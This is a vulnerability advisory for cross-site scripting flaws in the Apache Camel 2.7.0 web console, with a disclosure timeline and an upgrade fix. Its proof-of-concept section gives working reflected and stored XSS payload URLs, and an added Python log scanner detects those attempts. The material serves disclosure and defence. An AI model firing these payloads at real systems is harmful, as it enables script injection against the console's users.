Description
Apache Camel is a versatile open-source integration framework based on known Enterprise Integration Patterns. Camel empowers you to define routing and mediation rules in a variety of domain-specific languages, including a Java-based Fluent API, Spring or Blueprint XML Configuration files, and a Scala DSL.
Sow Ching Shiong, an independent vulnerability researcher, has discovered multiple Cross-Site Scripting vulnerabilities in Apache Camel. These issues were discovered in a default installation of Apache Camel 2.7.0. Other, earlier versions may also be affected.
Proof of concept
Reflected XSS
===========
http://[target]:8161/demo/portfolioPublish?count=1&refresh='"--></style></script><script>alert(/XSS/)</script>&stocks=SUNW
Permanent XSS
============
http://[target]:8161/camel/endpoints/mock:someName<iframe src="javascript:alert('Permanent XSS')"
To trigger Permanent XSS:
====================
http://[target]:8161/camel/endpoints
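As an added detection example (not part of the original advisory), the Python script below scans constructed access-log lines for requests to the two console paths above whose query values or endpoint names carry script, iframe or style markup, so that attempts against a not-yet-updated 2.7.0 instance can be spotted. The Common Log Format layout, the sample lines, the assumption that the console is served at the site root, and the function names are all assumptions.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Console paths of Apache Camel 2.7.0 named in the advisory (assumed served at the site root)
WATCHED_PATHS = ("/demo/portfolioPublish", "/camel/endpoints")
# Markup that has no business in a query value or an endpoint name
MARKUP_RE = re.compile(r"<\s*/?\s*(script|iframe|style)\b|javascript:", re.I)
# Common Log Format request line (assumed log layout)
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" \d{3}')

def decode_fully(s, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are not missed."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def inspect_request(raw_target):
    """Return (path, reason) for a suspicious request to a watched path, else None."""
    parts = urlsplit(decode_fully(raw_target))
    path = parts.path
    if not any(path.startswith(p) for p in WATCHED_PATHS):
        return None
    # Stored case: the endpoint name is the tail of the path under /camel/endpoints/
    if MARKUP_RE.search(path):
        return path, "markup in endpoint name"
    # Reflected case: markup in a query parameter such as refresh
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if MARKUP_RE.search(value):
            return path, "markup in parameter " + key
    return None

def scan_log(lines):
    """Return one finding per log line that looks like an XSS attempt."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (finding := inspect_request(m.group(2))):
            hits.append({"client": m.group(1), "path": finding[0], "reason": finding[1]})
    return hits

# Constructed sample log lines, not taken from any real server
SAMPLE_LOG = [
    '10.0.0.5 - - [06/May/2011:10:01:02 +0000] "GET /demo/portfolioPublish?count=1&refresh=5&stocks=SUNW HTTP/1.1" 200 512',
    '10.0.0.9 - - [06/May/2011:10:03:17 +0000] "GET /demo/portfolioPublish?count=1&refresh=%3Cscript%3Ealert(1)%3C/script%3E&stocks=SUNW HTTP/1.1" 200 640',
    '10.0.0.9 - - [06/May/2011:10:04:40 +0000] "GET /camel/endpoints/mock:someName%3Ciframe%20src=%22javascript:alert(1)%22 HTTP/1.1" 200 300',
    '10.0.0.7 - - [06/May/2011:10:05:00 +0000] "GET /camel/endpoints HTTP/1.1" 200 1800',
]
```

Running `scan_log(SAMPLE_LOG)` flags the second and third lines only; the benign portfolio request and the plain endpoint listing pass.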
Solution
Update to version 2.7.2 or later.
Reference
Vendor URL: https://issues.apache.org/jira/browse/CAMEL-3991
Disclosure Timeline
2011-05-06 - Vulnerabilities discovered.
2011-05-06 - Vulnerabilities reported to Secunia.
2011-05-06 - Secunia confirmed the vulnerabilities and contacted the vendor.
2011-05-19 - Patch released.
2011-05-19 - Advisory published by Apache.